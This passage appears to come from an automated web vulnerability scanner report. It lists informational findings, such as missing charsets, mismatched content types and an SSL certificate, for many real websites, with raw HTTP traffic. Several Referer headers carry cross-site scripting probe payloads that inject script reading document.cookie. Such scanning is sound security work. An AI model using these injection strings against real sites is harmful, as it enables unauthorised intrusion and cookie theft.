Content-Length: 738


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...

20.2. https://www.lowermybills.com/lending/home-refinance/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowermybills.com
Path:   /lending/home-refinance/

Request

GET /lending/home-refinance/ HTTP/1.1
Host: www.lowermybills.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:22 GMT
Server: Apache
Set-Cookie: SERVER_COOKIE=173.193.214.243.1295638882514991; path=/; expires=Sun, 20-Jan-13 19:41:22 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
ETag: W/"1447-1295483253000"
Last-Modified: Thu, 20 Jan 2011 00:27:33 GMT
Content-Length: 1447
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerpl.lmb2prod=872685578.20480.0000; path=/

<html>
<head>
<title></title>
<script type="text/javascript" language="javascript">
var userInfo = {
urlParams: {
jsEnabled: "Y",
resolution: "",

...[SNIP]...

20.3. https://www.toyotafinancial.com/consumer/tfs.portal

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.toyotafinancial.com
Path:   /consumer/tfs.portal

Request

GET /consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ResourceCenterHome&_nfls=true&referrer=TYT HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; ofsc=FTJHN5JcXX4n9z4wyQc0l1bTdQq7f3Xm1tqdryTQ8yDpFTxTGZvx!658673615!1980963653; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]; s_sq=undefinedtoJSONString%2CtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString;

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:54:44 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title >Toyota Financial Services: Resource Center Home</
...[SNIP]...

21. HTML does not specify charset
There are 7 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


21.1. https://www.lowermybills.com/lending/home-refinance/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowermybills.com
Path:   /lending/home-refinance/

Request

GET /lending/home-refinance/ HTTP/1.1
Host: www.lowermybills.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:22 GMT
Server: Apache
Set-Cookie: SERVER_COOKIE=173.193.214.243.1295638882514991; path=/; expires=Sun, 20-Jan-13 19:41:22 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
ETag: W/"1447-1295483253000"
Last-Modified: Thu, 20 Jan 2011 00:27:33 GMT
Content-Length: 1447
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerpl.lmb2prod=872685578.20480.0000; path=/

<html>
<head>
<title></title>
<script type="text/javascript" language="javascript">
var userInfo = {
urlParams: {
jsEnabled: "Y",
resolution: "",

...[SNIP]...

21.2. http://www.softcomplex.com/products/tigra_calendar_pro/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softcomplex.com
Path:   /products/tigra_calendar_pro/

Request

GET /products/tigra_calendar_pro/ HTTP/1.1
Host: www.softcomplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:30 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 17720
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

21.3. http://www.toyota.co.jp/en/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyota.co.jp
Path:   /en/index.html

Request

GET /en/index.html HTTP/1.1
Host: www.toyota.co.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:30:10 GMT
Last-Modified: Wed, 15 Dec 2010 01:26:04 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 113
Connection: close
Age: 1381

<html><head><meta http-equiv="refresh" CONTENT="0; URL=http://www.toyota-global.com/"></head><body></body></html>

21.4. http://www.toyota.com/download-brochure.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /download-brochure.html

Request

GET /download-brochure.html HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Date: Fri, 21 Jan 2011 19:53:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62194

<!DOCTYPE html>
<html>
   <head>
       <meta content="charset=utf-8" />
       <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" >
       <meta name="Description" content="Download a Toyota brochure for
...[SNIP]...

21.5. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /money/world/2011-01-20-chinabuilding20_ST_N.htm

Request

GET /money/world/2011-01-20-chinabuilding20_ST_N.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 22 Jan 2011 01:23:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 71520
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<script type="text/javascript" src="http://i.usatoday.net/_common/_scripts/_
...[SNIP]...

21.6. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

Request

GET /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354 HTTP/1.1
Host: www.washingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Web Server
Date: Fri, 21 Jan 2011 18:46:14 GMT
Content-type: text/html
Content-length: 4661
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Error - washingtonpost.com</title>

<script type="text/javascript">
<!--
//YOU CAN CHANGE THE NODE HERE
t
...[SNIP]...

21.7. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

Request

GET /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw HTTP/1.1
Host: www.washingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Web Server
Date: Fri, 21 Jan 2011 18:46:10 GMT
Content-type: text/html
Content-length: 4661
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Error - washingtonpost.com</title>

<script type="text/javascript">
<!--
//YOU CAN CHANGE THE NODE HERE
t
...[SNIP]...

22. Content type incorrectly stated
There are 8 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


22.1. http://www.100kcrossing.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.100kcrossing.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.100kcrossing.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7556cua1kmjisgrmbs54t62tc7; flagimg=UnitedStates.gif; useripcountry=277; useripstate=3896; useripcity=2655979; usercountry=277; userstate=3896; usercity=2655979; regioninfo=2655979%7E32.7830556%7E-96.8066667; __utmz=1.1295654883.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=1.1903501068.1295654883.1295654883.1295654883.1; __utmc=1; __utmb=1.2.10.1295654883

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 00:07:32 GMT
Server: Apache
Last-Modified: Thu, 01 May 2008 06:56:09 GMT
ETag: "1aa0365-47e-44c25c296b440"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 1150
Connection: Keep-alive
Via: 1.1 AN-0016020122545304

............ .h.......(....... ..... ..........................................................................................P...^0..[,..Z,..]/..U%..P...]/..\-..P...W'..\...Z,..[,..]/..N....t.......
...[SNIP]...

22.2. http://www.aharrisonbarnes.com/wp-content/plugins/wishlist-member/js/ZeroClipboard.wlm.js.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aharrisonbarnes.com
Path:   /wp-content/plugins/wishlist-member/js/ZeroClipboard.wlm.js.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /wp-content/plugins/wishlist-member/js/ZeroClipboard.wlm.js.php?ver=3.0.1 HTTP/1.1
Host: www.aharrisonbarnes.com
Proxy-Connection: keep-alive
Referer: http://www.aharrisonbarnes.com/?69719'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1fd47fb9727=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6l172e37v71rcv0l37cvee3g96; wpgb_visit_last_php-default=1295654937; wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22caf0b0ec76de78d91869eecad060b7ac%22%3Bi%3A1%3Bi%3A1295654938%3B%7D; wishlist_reg_cookie_manual=1

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 00:09:08 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 562

/*
* Zero Clipboard Initialization
* Mike Lopez v1.0
*/

var wlmClip = null;

function wlmClipInit(){
   ZeroClipboard.setMoviePath('/wp-content/plugins/wishlist-member/js/ZeroClipboard.swf');
   wlmC
...[SNIP]...

22.3. http://www.aharrisonbarnes.com/wp-content/plugins/wordpress-thread-comment/wp-thread-comment.js.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aharrisonbarnes.com
Path:   /wp-content/plugins/wordpress-thread-comment/wp-thread-comment.js.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /wp-content/plugins/wordpress-thread-comment/wp-thread-comment.js.php?jsver=common HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.aharrisonbarnes.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 00:15:35 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 2584

var rpPel = null;
var Commentarea = null;

function $s(){
   if(arguments.length == 1)
       return get$(arguments[0]);
   
   var elements = [];
   $c(arguments).each(function(el){elements.push(get$(el));});

   r
...[SNIP]...

22.4. http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/images/career_mission.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aharrisonbarnes.com
Path:   /wp-content/themes/HB_new_theme/images/career_mission.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /wp-content/themes/HB_new_theme/images/career_mission.png HTTP/1.1
Host: www.aharrisonbarnes.com
Proxy-Connection: keep-alive
Referer: http://www.aharrisonbarnes.com/?69719'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1fd47fb9727=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6l172e37v71rcv0l37cvee3g96; wpgb_visit_last_php-default=1295654937; wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22caf0b0ec76de78d91869eecad060b7ac%22%3Bi%3A1%3Bi%3A1295654938%3B%7D; wishlist_reg_cookie_manual=1

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 00:09:18 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Thu, 16 Sep 2010 12:07:16 GMT
ETag: "12b8101-1f08-4905f497c0500"
Accept-Ranges: bytes
Content-Length: 7944
Content-Type: image/png

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................-....
...[SNIP]...

22.5. http://www.bcgsearch.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bcgsearch.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.bcgsearch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=oe75j7p7vu4b8kk2unodlqkfe7; __utmz=182044340.1295638549.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=182044340.914584213.1295638549.1295638549.1295638549.1; __utmc=182044340; __utmb=182044340.1.10.1295638549

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:35:19 GMT
Server: Apache
Last-Modified: Wed, 02 Dec 2009 12:28:40 GMT
ETag: "970173-37e-479be03b84e00"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

..............h.......(....... ...............#...#.....................................................................................................................................................
...[SNIP]...

22.6. http://www.legalauthority.com/tmviewbanner.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.legalauthority.com
Path:   /tmviewbanner.php

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain HTML.

Request

GET /tmviewbanner.php?lpgid=2&wsid=19&cid=3553&bid=324&compid=3&style=reg&lpgprty=B&tp=B HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:40:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=4b3hf5pu51tq1jopdgjo1vqco4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 305
Connection: close
Content-Type: image/gif

<br />
<b>Warning</b>: file_get_contents(/home/utils/securefiles/xml/mctsbannerimages/324.gif) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such fi
...[SNIP]...

22.7. http://www.toyota.com/img/mobilepromo/mobileLogoBottom.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.toyota.com
Path:   /img/mobilepromo/mobileLogoBottom.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /img/mobilepromo/mobileLogoBottom.gif HTTP/1.1
Host: www.toyota.com
Proxy-Connection: keep-alive
Referer: http://www.toyota.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 28 Jul 2010 18:22:28 GMT
ETag: "3e639-5fc-b33d2100"
Accept-Ranges: bytes
Content-Length: 1532
Content-Type: image/gif
Date: Fri, 21 Jan 2011 19:21:59 GMT
Connection: close

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
...[SNIP]...

22.8. http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/myGuideParameters.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.toyotafinancial.com
Path:   /consumer/framework/skins/tfs/js/myGuideParameters.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /consumer/framework/skins/tfs/js/myGuideParameters.js HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ForwardEstimator6c74b%22%3balert(document.cookie)//3b7137a4f55
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:47:12 GMT
Content-length: 1316
Last-Modified: Fri, 02 Mar 2007 22:37:12 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript

vidPlanningCenter = 0;
vidFinancingOptions = 1;
vidUnderstandingCredit = 2;
vidDealershipVisit = 3;
vidVehicleProtectionPlans = 4;
vidPaymentProtectionPlans = 5;
vidPaymentEstimator = 6;
vidCol
...[SNIP]...

23. SSL certificate

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lawschoolloans.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.lawschoolloans.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Mar 18 23:41:30 CDT 2010
Valid to:  Thu Mar 24 13:57:20 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
